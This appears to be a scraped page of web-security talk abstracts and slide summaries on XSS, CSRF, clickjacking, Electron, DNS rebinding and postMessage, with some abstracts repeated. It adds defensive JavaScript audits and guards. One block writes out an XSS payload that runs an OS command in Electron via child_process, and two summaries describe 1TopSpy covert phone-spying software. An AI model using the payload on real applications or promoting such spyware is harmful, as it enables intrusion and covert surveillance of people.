video demos: http://whitehatsec.com/home/assets/videos/Top10WebHacks_Webinar031711.zip
Many notable and new Web hacking techniques were revealed in 2010. During this presentation, Jeremiah Grossman will describe the technical details of the top hacks from 2010, as well as some of the prevalent security issues emerging in 2011. Attendees will be treated to a step-by-step guided tour of the newest threats targeting today's corporate websites and enterprise users.
The top attacks in 2010 include:
• 'Padding Oracle' Crypto Attack
• Evercookie
• Hacking Auto-Complete
• Attacking HTTPS with Cache Injection
• Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
• Universal XSS in IE8
• HTTP POST DoS
• JavaSnoop
• CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
• Java Applet DNS Rebinding
Mr. Grossman will then briefly identify real-world examples of each of these vulnerabilities in action, outlining how the issue occurs, and what preventative measures can be taken. With that knowledge, he will strategize what defensive solutions will have the most impact.
When you don't have 0days: client-side exploitation for the masses
Conference: InsomniHack (21 March 2014)
Talk speakers:
Michele Orru (@antisnatchor)
Krzysztof Kotowicz (@kkotowicz)
Talk abstract:
A bag of fresh and juicy 0days is certainly something you would love to get
as a Christmas present, but it would probably be just a dream you had one of those drunken nights.
Hold on! Not all is lost! There is still hope for pwning targets without 0days.
We will walk you through multiple real-life examples of client-side pwnage, from tricking the victim to take the bait, to achieving persistence on the compromised system.
The talk will be highly practical and will demonstrate how you can do proper client-side exploitation effectively, simply by abusing existing functionalities of browsers, extensions, legacy features, etc.
We'll delve into Chrome and Firefox extensions (automating various repetitive actions that you'll likely perform in your engagements), HTML applications, abusing User Interface expectations, (Open)Office macros and more. All the attacks are supposed to work on fully patched target software, with a bit of magic trickery as the secret ingredient.
You might already know some of these exploitation vectors, but you might need a way to automate your attacks and tailor them based on the victim language, browser, and whatnot. Either way, if you like offensive security, then this talk is for you.
Video recording of the talk: https://connect.ruhr-uni-bochum.de/p3g2butmrt4/
HTML5 is quickly gaining media attention and popularity among browser vendors and web developers. Having tremendous features, together with its sister specifications like Drag & Drop API, File API or Geolocation it allows developers to build rich web applications that easily blend with desktop & mobile environments.
The talk will be focused on finding the weakest link and combining several recent attack techniques to turn a security vulnerability into a successful exploit.
We'll show how to build a successful advanced UI-redressing attack (also known as clickjacking), presenting the latest findings in this field, including malicious games and quizzes. We'll work on file upload functionality in current web applications and see how attackers might use HTML5 APIs to their advantage. Putting all these building blocks together will enable us to launch an attack and exploit even otherwise unexploitable vulnerabilities.
My presentation from Framsia.
Topics:
XSS (reflected, stored, dom-based)
CSRF
Clickjacking
Header based approaches (CSP, X-frame-options)
ECMAScript 5
HTML5
Some slides borrowed from John Wilander http://www.slideshare.net/johnwilander/application-security-for-rias
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin... (CODE BLUE)
Electron is a framework for building desktop applications for Windows, OS X and Linux, and it has been used to develop popular applications such as the Atom editor, Visual Studio Code and Slack.
Electron bundles Chromium and Node.js so that web developers can build desktop applications with the methods they are used to, but that combination brings its own security problems: a single DOM-based XSS in the application can be enough for arbitrary code execution, because the renderer can reach Node.js APIs. In fact, many vulnerabilities that allow arbitrary code to be loaded into Electron-based applications have been found and reported.
In this talk I focus on organizing and understanding the security problems that tend to occur when developing with Electron.
--- Yosuke Hasegawa
Secure Sky Technology Inc, Technical Adviser. Known for finding numerous vulnerabilities in Internet Explorer, Mozilla Firefox and many web applications. He has also presented at Black Hat Japan 2008, South Korea POC 2008, 2010 and others.
OWASP Kansai Chapter Leader, OWASP Japan Board member.
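The point the talk makes, that in Electron one DOM XSS is a code-execution bug, comes down to the renderer's `webPreferences`. The following is an added example, not code from the talk or from Electron: a vulnerable rendering pattern with the payload that turns it into command execution when `nodeIntegration` is on, the text-node alternative, and a small audit over a window's `webPreferences`. The key names are Electron's own; the `vulnerableWindowPrefs` and `hardenedWindowPrefs` objects and the `calc` payload are constructed for the example.

```javascript
// Added example: why DOM XSS in an Electron renderer is RCE, and how to audit
// a BrowserWindow's webPreferences. Not from the talk; Electron's key names only.

// --- Vulnerable pattern: untrusted string becomes live markup -----------------
function renderTitleUnsafe(container, untrustedTitle) {
  container.innerHTML = '<h1>' + untrustedTitle + '</h1>';   // DOM XSS sink
}
// Constructed payload. With nodeIntegration: true the page script can require()
// Node modules, so the "XSS" runs an OS command instead of stealing a cookie.
const XSS_TO_RCE_PAYLOAD =
  "<img src=x onerror=\"require('child_process').exec('calc')\">";

// --- Hardened rendering: never parse untrusted input as HTML -------------------
function renderTitleSafe(container, untrustedTitle) {
  const h1 = container.ownerDocument.createElement('h1');
  h1.textContent = untrustedTitle;           // text node, never interpreted
  container.replaceChildren(h1);
}

// --- Audit of webPreferences ---------------------------------------------------
// Real Electron webPreferences keys. Defaults changed across Electron versions,
// so an absent key is reported as "verify", not assumed safe.
const PREF_RULES = {
  nodeIntegration:             { safe: false, why: 'renderer can require() Node modules, so XSS == RCE' },
  contextIsolation:            { safe: true,  why: 'isolates preload/Electron internals from page script' },
  sandbox:                     { safe: true,  why: 'runs the renderer in the Chromium OS sandbox' },
  webSecurity:                 { safe: true,  why: 'disabling it turns off the same-origin policy' },
  allowRunningInsecureContent: { safe: false, why: 'lets HTTPS pages run active content over HTTP' },
};

// Returns a list of human-readable findings; empty means every rule passed.
function auditWebPreferences(prefs = {}) {
  const findings = [];
  for (const [key, rule] of Object.entries(PREF_RULES)) {
    if (!(key in prefs)) {
      findings.push(`${key}: not set explicitly; verify the default for your Electron version`);
    } else if (prefs[key] !== rule.safe) {
      findings.push(`${key}=${prefs[key]}: ${rule.why}`);
    }
  }
  return findings;
}

// Constructed window configurations for the two cases.
const vulnerableWindowPrefs = { nodeIntegration: true, contextIsolation: false };
const hardenedWindowPrefs = {
  nodeIntegration: false,
  contextIsolation: true,
  sandbox: true,
  webSecurity: true,
  allowRunningInsecureContent: false,
};
// In the main process: new BrowserWindow({ webPreferences: hardenedWindowPrefs })
```

With the hardened preferences the same `innerHTML` bug is still an XSS and still needs the `textContent` fix, but `require` is no longer reachable from page script, which is the difference between a defaced window and a compromised workstation.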
HTTP Security Headers Every Java Developer Must Know (Ayoma Wijethunga)
Demonstration based session on HTTP headers relevant to security aspect of web applications. Target audience is web developers, and more attention is given to Java language.
XSS (cross-site scripting) is a client-side vulnerability that allows injection of malicious JavaScript which can then be run on a victim's browser. The document discusses different types of XSS (non-persistent, persistent, DOM-based), examples of how to perform basic and advanced XSS attacks, ways XSS has been used on major websites, and how attackers can exploit XSS vulnerabilities for activities like session hijacking, cookie stealing, clickjacking, and more.
Protecting Java EE Web Apps with Secure HTTP Headers (Frank Kim)
This document summarizes techniques for securing Java EE web applications with secure HTTP headers and cookie attributes. It discusses cross-site scripting (XSS) and how to limit its impact with the HttpOnly cookie flag and the X-XSS-Protection header. It also covers session hijacking and how to prevent it with the Secure cookie flag and the Strict-Transport-Security header. Finally, it discusses clickjacking and demonstrates how it works.
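The two header talks above list what to send; what a practitioner usually needs is a check that a deployed application actually sends it. The following is an added example, not from either talk: an audit over a response's headers and Set-Cookie attributes, plus the header set a hardened application would return. One caveat on the talks' advice: X-XSS-Protection is obsolete, Chromium removed its XSS auditor and Firefox never implemented one, so the check below looks for a Content-Security-Policy instead. The header values, cookie name and the `weakHeaders` response are constructed for the example.

```javascript
// Added example: audit security headers and cookie flags of an HTTP response.
// `headers` is a plain object of lowercased header name -> value, with
// set-cookie as an array, the shape Node's http module exposes.

function auditResponseHeaders(headers) {
  const findings = [];
  const get = (name) => headers[name.toLowerCase()];

  // HSTS: present and long enough to survive an absence from the site
  const hsts = get('strict-transport-security');
  const maxAge = hsts && /max-age=(\d+)/i.exec(hsts);
  if (!hsts) findings.push('missing Strict-Transport-Security: TLS can be stripped on first visit');
  else if (!maxAge || Number(maxAge[1]) < 15552000) findings.push('Strict-Transport-Security max-age below 180 days');

  // Clickjacking: either legacy X-Frame-Options or CSP frame-ancestors must restrict framing
  const csp = get('content-security-policy') || '';
  const xfo = (get('x-frame-options') || '').trim();
  if (!/frame-ancestors/i.test(csp) && !/^(DENY|SAMEORIGIN)$/i.test(xfo)) {
    findings.push('no framing restriction (X-Frame-Options or CSP frame-ancestors): clickjacking possible');
  }

  // CSP as the XSS mitigation; 'unsafe-inline' in script-src throws that away
  if (!csp) findings.push('missing Content-Security-Policy: no defence in depth against XSS');
  else if (/script-src[^;]*'unsafe-inline'/i.test(csp)) findings.push("CSP script-src allows 'unsafe-inline', which defeats its XSS mitigation");

  if ((get('x-content-type-options') || '').toLowerCase() !== 'nosniff') {
    findings.push('missing X-Content-Type-Options: nosniff (MIME sniffing can turn uploads into scripts)');
  }

  // Cookie attributes: Secure (no cleartext leak), HttpOnly (no document.cookie), SameSite (CSRF)
  for (const cookie of [].concat(get('set-cookie') || [])) {
    const name = cookie.split('=')[0].trim();
    if (!/;\s*secure/i.test(cookie)) findings.push(`cookie ${name} lacks Secure`);
    if (!/;\s*httponly/i.test(cookie)) findings.push(`cookie ${name} lacks HttpOnly (readable by injected script)`);
    if (!/;\s*samesite=(lax|strict)/i.test(cookie)) findings.push(`cookie ${name} lacks SameSite=Lax/Strict`);
  }
  return findings;
}

// Header set a hardened application sends (constructed values; tune the CSP to your app).
function hardenedHeaders() {
  return {
    'strict-transport-security': 'max-age=31536000; includeSubDomains',
    'content-security-policy': "default-src 'self'; script-src 'self'; object-src 'none'; frame-ancestors 'none'",
    'x-frame-options': 'DENY',
    'x-content-type-options': 'nosniff',
    'set-cookie': ['JSESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax'],
  };
}

// Constructed response typical of a default Java EE deployment: nothing but the session cookie.
const weakHeaders = {
  'content-type': 'text/html;charset=UTF-8',
  'set-cookie': ['JSESSIONID=abc123; Path=/'],
};
```

Point the audit at real responses by feeding it `res.headers` from an `http.request` to each entry point, including error pages and redirects, which are where the header-setting filter is most often missing.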
Often, web developers keep hearing about "Same Origin Policy (SOP)" of browsers but live with half-knowledge or with several confusions. This session attempts to clear the misconceptions of SOP.
This document discusses security considerations for using UIWebView on iOS. It recommends only loading trusted content, implementing input validation, and using features like Content Security Policy (CSP) to mitigate risks like cross-site scripting (XSS). The document provides code examples for implementing CSP and filtering untrusted content. It also warns that JavaScript bridges between UIWebView and native code need special attention from a security perspective.
Slides of my talk at RuxCon 2013:
For those who do not listen to Mayhem and black metal, the talk title might seem a bit weird, and I can't blame you.
You know the boundaries of the Same Origin Policy, you know SQL injection and time delays, you know BeEF. You also know that when sending cross-domain XHRs you can still monitor the timing of the response: you might want to infer 0 or 1 bits depending on whether the response was delayed or not. This means it's possible to exploit every kind of SQL injection, blind or not blind, through a hooked browser, if you can inject a time delay and monitor the response timing. You don't need a 0day or a particular SOP bypass to do this, and it works in every browser.
The potential of being faster than a normal single-host multi-threaded SQLi dumper will be explored. Two experiments will be shown: WebWorkers as well as multiple synched hooked browsers, which split the workload, communicating partial results to a central server.
A pure JavaScript approach will be exclusively presented during this talk, including live demos. Such an approach would work for both internet-facing targets as well as applications available in the intranet of the hooked browser.
The talk will finish by discussing the implications of such an approach in terms of Incident Response and Forensics, showing evidence of a very small footprint.
This document discusses various tools from the OWASP project for securing modern web applications, including ESAPI and the Java Encoder for output encoding, the Secure Headers Project for response headers, and CSRFGuard for cross-site request forgery protection. It emphasizes using security features like content security policies, strict transport security, and X-frame options headers to help mitigate risks like cross-site scripting and clickjacking attacks. The document also demonstrates cross-site request forgery vulnerabilities using the OWASP 1-Liner application and how to address them with anti-CSRF tokens.
This document discusses DNS rebinding attacks and defenses against them. DNS rebinding works by resolving a domain name to the attacker's IP address for a short time, then rebinding it to the target's IP. This allows the attacker to circumvent the same-origin policy and run code on the target's machine. Experiments showed the attack could recruit over 30,000 browsers to a botnet without any user interaction using Flash. Defenses include smarter pinning in browsers, host name authorization, and policy-based approaches. Plug-ins also need to consult server policies before opening sockets.
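Of the defences listed above, host name authorization is the one an application owner can deploy today without waiting for browsers or plug-ins: a rebound request reaches the internal service with the attacker's domain in the Host header, because the browser still believes it is talking to that domain. The following is an added example, not from the paper: a strict Host header parser, an allowlist check and a guard for Node's `http` module that answers 421 to anything else. The allowlisted names are assumptions.

```javascript
// Added example: Host header authorization against DNS rebinding (not from the paper).

// Names this service is actually reachable as (assumed for the example).
const ALLOWED_HOSTS = new Set(['admin.internal.example', 'localhost', '127.0.0.1']);

// RFC 7230: Host = uri-host [ ":" port ]. Anything else is rejected outright,
// which keeps tricks like "evil.example@admin.internal.example" from reaching
// a lenient URL parser.
function parseHostHeader(hostHeader) {
  if (typeof hostHeader !== 'string') return null;
  const m = /^(\[[0-9a-f:.]+\]|[a-z0-9.-]+)(?::(\d{1,5}))?$/i.exec(hostHeader);
  if (!m) return null;
  return { hostname: m[1].toLowerCase(), port: m[2] ? Number(m[2]) : null };
}

// True only if the Host header names this service; the port is ignored on purpose,
// since the rebinding attack targets the port, not the name.
function isAuthorizedHost(hostHeader, allowed = ALLOWED_HOSTS) {
  const parsed = parseHostHeader(hostHeader);
  return parsed !== null && allowed.has(parsed.hostname);
}

// Guard for a Node http handler: returns true to continue, otherwise answers
// 421 Misdirected Request and returns false. Runs before any routing or auth,
// so a rebound browser gets nothing, not even a login page.
function rebindingGuard(req, res) {
  if (isAuthorizedHost(req.headers.host)) return true;
  res.writeHead(421, { 'Content-Type': 'text/plain' });
  res.end('unrecognised Host header');
  return false;
}

// Wiring (not executed here):
// const http = require('http');
// http.createServer((req, res) => {
//   if (!rebindingGuard(req, res)) return;
//   res.end('internal admin UI');
// }).listen(8080, '127.0.0.1');
```

The check belongs on every internal HTTP listener, not only the "admin" ones: the paper's point is that any service the victim's browser can reach by IP is a target, and the Host header is the one thing the rebinding attacker cannot make match.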
XPC is a well-known interprocess communication mechanism used on Apple devices. Abusing XPC led to many severe bugs, including those used in jailbreaks. While the XPC bugs in Apple's components are harder and harder to exploit, did we look at non-Apple apps on macOS? As it turns out, vulnerable apps are everywhere - Anti Viruses, Messengers, Privacy tools, Firewalls, and more.
This presentation:
1. Explain how XPC/NSXPC work
2. Present some of my findings in popular macOS apps (e.g. local privilege escalation to r00t)
3. Abuse an interesting feature in Catalina that allows injecting an unsigned dylib
4. Show you how to finally fix that vulnz!
The document provides an overview of secure web messaging in HTML5. It discusses how traditional methods of communication like JavaScript, AJAX, and frames had limitations due to the same-origin policy. The HTML5 postMessage API allows for secure cross-origin communication between frames by abstracting multiple principals. While more secure than previous techniques, the postMessage API still requires careful configuration of target origins, validation of received data, and mitigation of framing attacks to prevent security issues like cross-site scripting.
This document discusses security challenges with web applications that combine content from multiple sources (mashups). It covers how the same-origin policy isolates origins but exempts scripts, allowing cross-site scripting attacks. Frame-based communication and the postMessage API provide secure cross-origin messaging capabilities. The document recommends sandboxing iframes and using features like CORS to mitigate risks in mashups.
The WhiteHat Website Security Statistics Report provides a one-of-a-kind perspective on the state of website security and the issues that organizations must address to avert attack. WhiteHat has been publishing the report, which highlights the top ten vulnerabilities, vertical market trends and new attack vectors, since 2006.
The WhiteHat report presents a statistical picture of current website vulnerabilities, accompanied by WhiteHat expert analysis and recommendations. WhiteHat’s report is the only one in the industry to focus solely on unknown vulnerabilities in custom Web applications, code unique to an organization, within real-world websites.
This document provides instructions for exploiting various web application vulnerabilities, including remote file inclusion (RFI), local file inclusion (LFI), SQL injection, and more. It begins by explaining RFI and how to exploit it, including using a null byte bypass. It then covers LFI and how to escalate it to remote code execution (RCE). Other sections discuss uploading shells via LFI and Firefox, exploiting vulnerabilities to download local files, full path disclosure, SQL injection techniques, and automatically uploading a shell via a phpThumb() command injection vulnerability. The document aims to serve as a tutorial for hackers to learn various web hacking methods.
This document discusses HTML5 web messaging and the same origin policy. It introduces the MessageEvent object used to handle cross-document messaging and describes how to use the postMessage() method and MessageChannel interface to communicate across browsing contexts from different origins securely. Examples are given of using web messaging to extend the browser's capabilities by communicating between injected scripts, pages, and background processes.
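The three postMessage summaries above (secure web messaging, mashup security, and HTML5 web messaging) all come down to the same three checks on the receiving side and one rule on the sending side. The following is an added example, not from any of those documents: a receiver that verifies `event.origin` by exact comparison, validates the message shape against a fixed set of message types, replies only to the origin that asked, and a sender that refuses a wildcard target origin. The origins `https://app.example` and `https://widget.example` and the `profile:get` message type are assumptions.

```javascript
// Added example: defensive postMessage receiver and sender (not from the documents above).

const TRUSTED_ORIGINS = new Set(['https://app.example', 'https://widget.example']); // assumed

// Closed set of message types. Handlers return plain data; nothing from the
// message is ever evaluated or inserted as HTML.
const HANDLERS = {
  'profile:get': (payload) =>
    typeof payload.user === 'string' ? { user: payload.user.slice(0, 64) } : { error: 'bad payload' },
};

function handleMessage(event, trusted = TRUSTED_ORIGINS) {
  // 1. Origin check. event.origin is set by the browser and cannot be forged by the
  //    sender. Compare exactly: startsWith('https://app.example') would also accept
  //    https://app.example.evil, and a missing check accepts any page holding a reference.
  if (!trusted.has(event.origin)) return { accepted: false, reason: 'untrusted origin' };

  // 2. Shape check. Even a trusted origin may be compromised (XSS on that page), so
  //    the data is treated as attacker-influenced. Own-property lookup blocks
  //    'constructor' / '__proto__' style type names from reaching Object.prototype.
  const data = event.data;
  if (!data || typeof data !== 'object' || typeof data.type !== 'string') {
    return { accepted: false, reason: 'malformed' };
  }
  if (!Object.prototype.hasOwnProperty.call(HANDLERS, data.type)) {
    return { accepted: false, reason: 'unknown type' };
  }
  const result = HANDLERS[data.type](data.payload || {});

  // 3. Reply to the exact origin that asked. A '*' here would hand the result to
  //    whatever document is in that window now, e.g. after a navigation.
  if (event.source && typeof event.source.postMessage === 'function') {
    event.source.postMessage({ type: data.type + ':result', result }, event.origin);
  }
  return { accepted: true, result };
}

// Sender side: always name the target origin for non-public data.
function sendToFrame(frameWindow, message, targetOrigin) {
  if (targetOrigin === '*') throw new Error('refusing wildcard targetOrigin for non-public data');
  frameWindow.postMessage(message, targetOrigin);
}

// In a page: window.addEventListener('message', (e) => handleMessage(e));
```

The framing-attack mitigation the first summary mentions is orthogonal to this code: a correct receiver still needs `frame-ancestors` or X-Frame-Options on the page that hosts it, otherwise a hostile top document can still overlay it for clickjacking.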
Security Risk Management: how to mitigate and manage data risks through managed services - by Hitachi Systems - festival ICT 2015
Speaker: Denis Cassinerio
Security Business Unit Director, Hitachi Systems CBT
The document discusses various web application attacks like cross-site scripting, SQL injection, cross-site request forgery, sensitive data exposure, and cookie editing. For each attack, it provides information on threat agents, attack vectors, security weaknesses, impacts, prevalence, detectability, example exploits, and steps to prevent the attack. The overall document serves as an educational guide on common web hacking techniques and how to avoid falling victim to them.
This document discusses security issues related to Flash applications and cross-domain access. It covers how the crossdomain.xml file controls cross-domain access and demonstrates how this can be exploited. Attack surfaces like global parameters, external resources, and HTML text areas are described. The document recommends limiting JavaScript access in embedded Flash, ensuring configurations and external resources come from trusted domains, and sanitizing data in HTML text areas.
- The document summarizes a study of flash crowd dynamics in a peer-to-peer live video streaming system called Coolstreaming. It analyzes data collected during a flash crowd event when tens of thousands joined simultaneously.
- It finds the number of short sessions (under 2 minutes) increases significantly during a flash crowd, correlated with high joining rates. This suggests new peers struggle to start playback due to limited resources.
- User retry behavior is also analyzed, showing users try multiple times to join during a flash crowd. The system can scale up to a limit but with longer startup delays and potential disruptions during flash crowds.
The document discusses vulnerabilities in Adobe Flash and the risk of exploitation. It provides a history of Flash exploits from 2001-2008, noting common bugs like file format validation issues and input validation errors. It analyzes trends in Flash security advisories, finding that almost half of vulnerabilities allow remote code execution. The document warns that a Flash virus or worm is inevitable given the widespread use of Flash and continued emergence of vulnerabilities.
Control and error messages of the TCP/IP suite - ICMP
The document describes the control and error messages of the TCP/IP protocol suite. It explains that ICMP is used to send error and control messages between network devices, since IP on its own neither guarantees packet delivery nor provides error notifications. It also describes various ICMP message types, such as echo, redirect, timestamp and destination unreachable, and their use in diagnosing communication problems on IP networks.
This document introduces Proxenet, a hacker-friendly web application proxy designed to be easily extensible through plugins. Proxenet is written entirely in C for high performance. It uses a microkernel approach where a small core handles connections and delegates all other functionality to plugins. Plugins are simple to create, requiring only request and response hook functions. The document demonstrates how Proxenet can be used for man-in-the-middle attacks by modifying HTTP traffic using plugins during active directory poisoning attacks on internal networks.
This document defines computer viruses and describes their characteristics, effects and classifications. Viruses are harmful programs that hide themselves, spread and infect other computers. They can consume resources, reduce performance and destroy information. Several types exist, such as Trojan horses, chameleons, polymorphic viruses and worms. Viruses are created by hackers to cause damage. Using antivirus software and not running suspicious files is recommended to prevent infections.
The top 10 security issues in web applications are:
1. Injection flaws such as SQL, OS, and LDAP injection.
2. Cross-site scripting (XSS) vulnerabilities that allow attackers to execute scripts in a victim's browser.
3. Broken authentication and session management, such as not logging users out properly or exposing session IDs.
4. Insecure direct object references where users can directly access files without authorization checks.
5. Cross-site request forgery (CSRF) that tricks a user into performing actions they did not intend.
6. Security misconfiguration of web or application servers.
7. Insecure cryptographic storage of passwords or sensitive data.
8
The document introduces the concepts of malware and computer viruses, describing their characteristics, classifications, means of propagation and damage. It explains virus types such as boot sector, file, macro and encrypted viruses, as well as their symptoms and the stages of an infection. Finally, it recommends protective measures such as antivirus software, firewalls and the implementation of security policies.
This document advertises 1TopSpy cell phone tracking software and describes its features for hacking into phones and monitoring activity. It claims the software can track location, read texts, messages on apps like WhatsApp and Facebook, and more across millions of phones. The summary provides instructions to download the software onto a target phone, login on a computer, and begin monitoring. Customer testimonials praise the software's usefulness for parenting and employee monitoring.
Information security seeks to protect the assets of a company or individual, such as information, equipment and people, by safeguarding the principles of integrity, confidentiality and availability of information. This is achieved by identifying threats and vulnerabilities and applying security measures such as risk analysis and security policies.
This document provides information on open source intelligence (OSINT) techniques for information gathering. It discusses performing passive, semi-passive, and active information gathering. Key areas of focus are infrastructure intelligence gathering to identify networks and domains, and people/organization intelligence gathering to find emails, metadata in documents, and profiles of employees. A variety of tools are recommended to automate the process, including Maltego, theHarvester, FOCA, and APIs from services like Zoominfo.
This document describes how to use 1TopSpy software to hack and track any mobile phone within 5 minutes. It lists the features of 1TopSpy including tracking GPS location, monitoring text messages, calls, WhatsApp messages, and more. The summary describes downloading and installing 1TopSpy on the target phone, logging into the 1TopSpy website to begin monitoring. Customer testimonials praise 1TopSpy for allowing worried parents and businesses to discreetly monitor mobile activity.
Devfest istanbul'14 - Web Application Attacks and Trusting Frameworks
Frameworks are undeniably one of the most important elements of modern web applications. As we continue to witness a significant increase in the number of framework-based attacks against web applications each day, the use of frameworks without considering their security aspects remains the most drastic problem developers face. Throughout the presentation, Mr. İnce will analyze one of the most commonly used PHP web frameworks, highlighting important security considerations, followed by a real-time exploitation of a discovered vulnerability in a lab environment.
Many notable and new web hacking techniques, discoveries and compromises were uncovered in 2008. During his session, Jeremiah Grossman will present the top 10 vulnerabilities of 2008, as well as some of the prevalent security issues emerging in 2009. Attendees will virtually walk through the vulnerabilities appearing on today's corporate websites, learning real-world solutions to today's web application security issues.
Moderator: Mike Stephenson, SC lab manager, SC Magazine
- Jeremiah Grossman, founder and chief technology officer, WhiteHat Security
Rich Web App Security - Keeping your application safe
The document discusses securing web applications from common vulnerabilities like cross-site scripting (XSS) and cross-site request forgery (CSRF). It outlines various techniques attackers use to exploit these issues, such as injecting malicious scripts into user input or forging unauthorized requests. The document then provides recommendations for developers to prevent these attacks, such as carefully validating and encoding all user input, and authenticating that requests are intended by the user.
Caleb Sima is the founder and CTO of SPI Dynamics, a security company. He has over 11 years of experience in security and is a frequent speaker on topics like exploiting web security vulnerabilities and hacking web applications. The document discusses various web application vulnerabilities like SQL injection, cross-site scripting, and session hijacking, and provides examples of exploiting these vulnerabilities on real websites.
Cross-Site Request Forgery (CSRF) is a major web vulnerability that forces users to perform unintended actions on websites. It remains underreported due to the difficulty of detection. CSRF can be used to hijack user accounts, modify browser settings, and force purchases without user awareness or consent. While solutions like tokens exist, many websites remain vulnerable to CSRF attacks.
I took pictures from here and there by googling, not mentioning all sources; please let me know if anyone has any objection. This presentation was presented at the "securITy" Information Security Conference at BASIS SoftExpo 2012.
The document provides instructions for setting up a lab environment to practice HTML5 hacking techniques. It includes details on installing VirtualBox and shared folders, as well as IP addresses to use for the "localvictim" and "evil" servers. The remainder of the document outlines a plan to cover various HTML5-related attacks, including bypassing the same-origin policy, exploiting XSS vectors in HTML5, attacking with cross-origin resource sharing and web messaging, targeting client-side storage, and using web sockets. Disclaimers are provided about the practical nature of the workshops and limited time.
Top 10 Web Hacks
Every year the number and creativity of Web hacks increases, and the damage from these attacks rises exponentially, costing organizations millions every year.
Join this webinar to learn about the latest and most insidious Web-based attacks. The much anticipated list, now in its seventh year, represents exhaustive research conducted by a panel of experienced security industry professionals. Learn the latest of the worst in Web hacks, and how to protect your organization.
Cross-Site Request Forgery (CSRF) is a type of malicious attack that tricks a user into unknowingly executing unwanted actions on a web application. The attacker creates hidden HTTP requests that get executed in the victim's browser using their authentication credentials. This allows the attacker to perform sensitive functions like changing passwords, making purchases, or posting comments on the victim's behalf. Defenses include using secret tokens or custom headers to validate requests and prevent CSRF attacks. The Firefox add-on CsFire also helps protect users by removing authentication information from cross-domain requests.
1) The document discusses new hacking techniques that can exploit browsers and access internal corporate networks even when the browser has JavaScript disabled or restricted. These techniques bypass traditional perimeter security measures.
2) One technique uses CSS to steal a user's browsing history without JavaScript. Another obtains the user's internal IP address using a Java applet and then port scans the internal network to find vulnerabilities.
3) The author concludes that a user's browser, when visiting public websites, can potentially be silently hijacked to target and hack resources on the internal corporate network.
The document discusses security considerations for HTML5. It notes that while HTML5 specifications are not inherently flawed, bad code can introduce new vulnerabilities. It outlines several attack vectors like XSS, history tampering, web storage manipulation, and clickjacking. It also discusses mitigations like script isolation, cross-document messaging, sandboxing, and CORS, noting their limitations. The document aims to raise awareness of the expanded client-side attack surface in HTML5.
[CB16] Esoteric Web Application Vulnerabilities by Andrés Riancho (CODE BLUE)
This talk will show esoteric web application vulnerabilities in detail. These vulnerabilities would be missed in a quick review by most security consultants, but could lead to remote code execution, authentication bypass and purchasing items from merchants that use PayPal as their payment gateway without actually paying. SQL injections are dead, and I don’t care: let's explore the world of null, nil and NULL; NoSQL injections; Host header injections that lead to phone call audio interception; PayPal's double spend and Rails’ MessageVerifier remote code execution.
--- Andres Riancho
Andrés Riancho is an application security expert that currently leads the community driven, Open Source, w3af project and provides in-depth Web Application Penetration Testing services to companies around the world.
In the research field, he discovered critical vulnerabilities in IPS appliances from 3Com and ISS, contributed to SAP research performed at one of his former employers, and reported vulnerabilities in hundreds of web applications.
His main focus has always been the Web Application Security field, in which he developed w3af, a Web Application Attack and Audit Framework used extensively by penetration testers and security consultants.
Andrés has spoken and held trainings at many security conferences around the globe, such as BlackHat (USA and Europe), SEC-T (Sweden), DeepSec (Austria), PHDays (Moscow), SecTor (Toronto), OWASP (Poland), CONFidence (Poland), OWASP World C0n (USA), CanSecWest (Canada), PacSecWest (Japan), T2 (Finland) and Ekoparty (Buenos Aires).
Andrés founded Bonsai Information Security, a web security focused consultancy firm, in 2009 in order to further research into automated Web Application Vulnerability detection and exploitation.
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions (Krzysztof Kotowicz)
This document discusses attacking Chrome extensions through exploiting vulnerabilities in their architecture and code. It begins by explaining the components and permissions model of Chrome extensions. It then describes how to exploit vulnerabilities like DOM XSS in extensions' UI pages under the legacy v1 model. The document outlines fixes made in the v2 model but still finds ways to bypass security restrictions, such as through content script XSS. It introduces tools like XSSChEF and Mosquito for exploiting extensions. The presentation concludes by noting CSP should only be seen as a mitigation rather than prevention for extension vulnerabilities.
When you don't have 0days: client-side exploitation for the massesMichele Orru
Conference: InsomniHack (21 March 2014)
Talk speakers:
Michele Orru (@antisnatchor)
Krzysztof Kotowicz (@kkotowicz)
Talk abstract:
A bag of fresh and juicy 0days is certainly something you would love to get
as a Christmas present, but it would probably be just a dream you had one of those drunken nights.
Hold on! Not all is lost! There is still hope for pwning targets without 0days.
We will walk you through multiple real-life examples of client-side pwnage, from tricking the victim to take the bait, to achieving persistence on the compromised system.
The talk will be highly practical and will demonstrate how you can do proper client-side exploitation effectively, simply by abusing existing functionalities of browsers, extensions, legacy features, etc.
We'll delve into Chrome and Firefox extensions (automating various repetitive actions that you'll likely perform in your engagements), HTML applications, abusing User Interface expectations, (Open)Office macros and more. All the attacks are supposed to work on fully patched target software, with a bit of magic trickery as the secret ingredient.
You might already know some of these exploitation vectors, but you might need a way to automate your attacks and tailor them based on the victim language, browser, and whatnot. Either way, if you like offensive security, then this talk is for you.
Video recording of the talk: https://connect.ruhr-uni-bochum.de/p3g2butmrt4/
HTML5 is quickly gaining media attention and popularity among browser vendors and web developers. Having tremendous features, together with its sister specifications like Drag & Drop API, File API or Geolocation it allows developers to build rich web applications that easily blend with desktop & mobile environments.
The talk will be focused on finding the weakest link and combining several recent attack techniques to turn a security vulnerability into a successful exploit.
We'll show how to build a successful advanced UI-Redressing attack (also known as clickjacking), presenting the latest findings in this field, including malicious games and quizes. We'll work on file upload functionalities in current web applications and see how attackers might use HTML5 APIs for their advantage. Putting all these building blocks together will enable us to launch an attack and exploit even the otherwise unexploitable vulnerabilities.
My presentation from Framsia.
Topics:
XSS (reflected, stored, dom-based)
CSRF
Clickjacking
Header based approaches (CSP, X-frame-options)
EcmaScript5
HTML5
Some slides borrowed from John Wilander http://www.slideshare.net/johnwilander/application-security-for-rias
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
Electron is a framework to create the desktop application on Windows,OS X, Linux easily, and it has been used to develop the popular applications such as Atom Editor, Visual Studio Code, and Slack.
Although Electron includes Chromium and node.js and allow the web application developers to be able to develop the desktop application with accustomed methods, it contains a lot of security problems such as it allows arbitrary code execution if even one DOM-based XSS exist in the application. In fact, a lot of vulnerabilities which is able to load arbitrary code in applications made with Electron have been detected and reported.
In this talk, I focus on organize and understand the security problems which tend to occur on development using Electron.
--- Yosuke Hasegawa
